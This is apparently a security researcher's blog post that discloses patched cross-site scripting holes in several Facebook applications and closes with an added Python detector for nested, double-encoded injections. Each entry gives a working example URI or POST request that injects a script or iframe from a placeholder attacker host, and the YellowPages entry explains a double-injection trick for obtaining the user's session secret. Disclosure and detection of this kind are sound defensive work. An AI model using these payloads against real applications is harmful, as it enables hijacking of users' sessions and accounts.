Before the first new report in the FAXX series, I thought I would begin by reviewing a few previous holes that have (mostly) already been patched.
FAXX Hack: FunSpace
Facebook Verified Application
Current Monthly Active Users: 8,527,725
Current Rank on Application Leaderboard: 20
Application Developer: Slide, Inc.
Vulnerability Status: Patched
Capable of Clickjacking Install: Yes
Example URI: http://apps.facebook.com/crazyfunpix/header_iframe/?url=)%22%3E%3Cscript+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E%3C%2Fscript%3E%3Ca+href%3D%22(&CXNID=1000005.8NXC
FAXX Hack: SuperPoke!
Facebook Verified Application
Current Monthly Active Users: 2,097,148
Current Rank on Application Leaderboard: 71
Application Developer: Slide, Inc.
Vulnerability Status: Patched
Capable of Clickjacking Install: Yes
Example URI: http://apps.facebook.com/superpokey/sp_main/?CXNID=1000005.6NXC&fb_force_mode=iframe&error=%3Cscript+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E%3C%2Fscript%3E
FAXX Hack: SocialToo
Current Monthly Active Users: 1,835
Application Developer: Stay N’ Alive Productions, LLC
Vulnerability Status: Patched
Capable of Clickjacking Install: No
Example POST Request: http://apps.facebook.com/socialtoo/vanity?submit=Update&username=\"><fb:iframe src='http://EVILURI/'>
Notes: This application generally has extended permissions, such as status_update.
FAXX Hack: YellowPages.ca
Reported By: Uber0n at XSSed.com on March 22, 2009
Current Monthly Active Users: 1,198
Application Developer: Yellow Pages Group Co.
Vulnerability Status: Patched as of Sep. 2, 2009 (previously listed as Unpatched)
Capable of Clickjacking Install: No
Example URI: http://apps.facebook.com/yellowpagesca/?task=search&YP_what=%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffacebook.yellowpages.ca%2Fapp%2F%3Ftask%3Dsearch%26YP_what%3D%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%253C%252Fscript%253E%2B%26YP_where%3DCanada%22%3E&YP_where=Canada
Notes: The above example demonstrates a double injection trick I began using for FBML applications. First, the hole is used to insert an <fb:iframe> tag into the FBML of the canvas page. Second, this inserted iframe loads the direct URI of the application page, with the hole exploited a second time to insert a script file, since the iframe loads as HTML rather than FBML. Since the domain of the iframe matches the application domain, the iframe receives the user’s session secret.
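The double injection relies on one parameter carrying a second, percent-encoded payload that only becomes live after the iframe target decodes it again. As an added example (not code from the original post or from any of the applications listed), the Python below unwraps each query parameter one decoding layer at a time and reports at which depth a script or iframe tag appears; function names are mine and EVILURI is kept as the post's placeholder.

```python
from __future__ import annotations
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Markup that should never appear inside a parameter an application reflects
# into its canvas page: a script tag (HTML/iframe mode) or an FBML/HTML iframe
# tag (FBML mode), the two primitives used in the reports above.
INJECTION_RE = re.compile(r"<\s*(?P<tag>script|fb:iframe|iframe)\b", re.IGNORECASE)

# Constructed from the YellowPages.ca example URI in this post.
SAMPLE_URI = ("http://apps.facebook.com/yellowpagesca/?task=search&YP_what=%22%3E%3Cfb%3Aiframe+src%3D"
              "%22http%3A%2F%2Ffacebook.yellowpages.ca%2Fapp%2F%3Ftask%3Dsearch%26YP_what%3D%2522%253E"
              "%253Cscript%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%253C%252Fscript%253E"
              "%2B%26YP_where%3DCanada%22%3E&YP_where=Canada")

def injected_tags(value: str, max_rounds: int = 5) -> dict[str, int]:
    """Map each injected tag name to the decoding depth at which it first appears.

    Depth 0 is the value as the application receives it after the standard
    URL decode; each further round percent-decodes the value again. A tag that
    only shows up at depth 1 or deeper is a nested payload, like the <script>
    hidden inside the <fb:iframe> src above, which is inert in the FBML page
    and only becomes live once the iframe target decodes it a second time.
    """
    found: dict[str, int] = {}
    for depth in range(max_rounds + 1):
        for match in INJECTION_RE.finditer(value):
            found.setdefault(match.group("tag").lower(), depth)  # keep first depth
        decoded = unquote(value)
        if decoded == value:  # no percent-escapes left, stop unwrapping
            break
        value = decoded
    return found

def find_injected_params(uri: str) -> list[dict]:
    """Return one finding per query parameter of `uri` that carries injected markup."""
    findings = []
    # parse_qsl performs the first decode (and turns '+' into a space), which is
    # what the canvas application itself sees.
    for name, raw in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        tags = injected_tags(raw)
        if tags:
            findings.append({"param": name, "tags": tags})
    return findings

if __name__ == "__main__":
    for finding in find_injected_params(SAMPLE_URI):
        print(finding)  # {'param': 'YP_what', 'tags': {'fb:iframe': 0, 'script': 1}}
```

A depth-1 hit is the signal worth alerting on: a single round of decoding plus output encoding stops the outer tag, but the inner payload survives until the second page decodes it, so the fix has to HTML-encode the value at every point it is reflected.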